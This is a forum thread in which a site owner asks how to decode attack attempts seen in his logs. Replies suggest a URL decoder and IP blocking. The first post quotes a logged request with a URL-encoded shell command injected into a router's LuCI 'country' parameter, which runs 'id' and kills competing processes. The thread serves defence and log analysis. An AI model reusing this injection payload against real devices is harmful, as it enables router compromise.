Post by Cue4cheap » Wed Jul 10, 2024 8:21 am

Hi,

Looking for some info for how people that look through their logs and how they decipher some of the hack attempts.

For example I can look up this part of what was logged and find a good bit of info through google:
/cgi-bin/luci/;stok=/locale

But what about the rest of the text? It would be good to have a tool to dump in the rest and get out plain text. Does anyone have a tool or site they use?

Code: Select all

GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60)
Mike

cue4cheap not cheap quality


Expert Member

Posts

Joined
Fri Sep 20, 2013 4:45 am

Post by ADD Creative » Wed Jul 10, 2024 7:12 pm

It looks to be URL encoded. Just search for a URL decode tool, should be a few online ones.

www.add-creative.co.uk


Guru Member

Posts

Joined
Sat Jan 14, 2012 1:02 am
Location - United Kingdom

Post by JNeuhoff » Wed Jul 10, 2024 8:19 pm

And whoever calls this non-existing script: Just block its IP-address via the '.htaccess'.

Export/Import Tool * SpamBot Buster * Unused Images Manager * Instant Option Price Calculator * Number Option * Google Tag Manager * Survey Plus * OpenTwig


User avatar
Guru Member
Online

Posts

Joined
Wed Dec 05, 2007 3:38 am

Who is online

Users browsing this forum: Semrush [Bot] and 10 guests